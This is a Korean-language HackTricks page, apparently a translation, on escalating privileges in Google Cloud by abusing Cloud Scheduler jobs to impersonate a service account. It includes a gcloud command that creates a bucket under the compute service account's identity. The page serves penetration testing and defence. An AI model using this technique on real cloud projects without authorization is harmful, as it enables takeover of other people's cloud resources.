GCP - Cloudscheduler Privesc

htARTE (HackTricks AWS Red Team Expert)을 통해 AWS 해킹을 처음부터 전문가까지 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 상품을 구매하세요.
The PEASS Family를 발견하세요. 독점적인 NFTs 컬렉션입니다.
💬 Discord 그룹 또는 telegram 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 자신의 해킹 기법을 공유하세요.

cloudscheduler

`cloudscheduler.jobs.create`, `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)

이 권한을 가진 공격자는 Cloud Scheduler를 악용하여 특정 서비스 계정으로 cron 작업을 인증할 수 있습니다. HTTP POST 요청을 조작함으로써, 공격자는 Storage 버킷 생성과 같은 작업을 서비스 계정의 신원으로 실행할 수 있습니다. 이 방법은 스케줄러가 *.googleapis.com 엔드포인트를 대상으로하고 요청을 인증하는 능력을 활용하여, 공격자가 간단한 gcloud 명령을 사용하여 Google API 엔드포인트를 직접 조작할 수 있게 합니다.

예를 들어, 특정 서비스 계정을 사용하여 Storage 버킷을 생성하는 새 작업을 만들려면 다음 명령을 실행할 수 있습니다:

gcloud scheduler jobs create http test –schedule='* * * * *' –uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com –headers Content-Type=application/json

권한 상승을 위해, 공격자는 원하는 API를 대상으로 하는 HTTP 요청을 조작하여 지정된 서비스 계정을 가장하는 것입니다.

참고 자료

https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/

htARTE (HackTricks AWS Red Team Expert)를 통해 제로에서 영웅까지 AWS 해킹을 배워보세요!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드하려면 SUBSCRIPTION PLANS를 확인하세요!
공식 PEASS & HackTricks 스웨그를 얻으세요.
독점적인 NFT 컬렉션인 The PEASS Family를 발견하세요.
💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
HackTricks와 HackTricks Cloud github 저장소에 PR을 제출하여 여러분의 해킹 기법을 공유하세요.

前へGCP - Cloudidentity Privesc 次へGCP - Compute Privesc

最終更新 2 か月前

cloudscheduler

cloudscheduler.jobs.create, iam.serviceAccounts.actAs, (cloudscheduler.locations.list)

참고 자료

`cloudscheduler.jobs.create`, `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)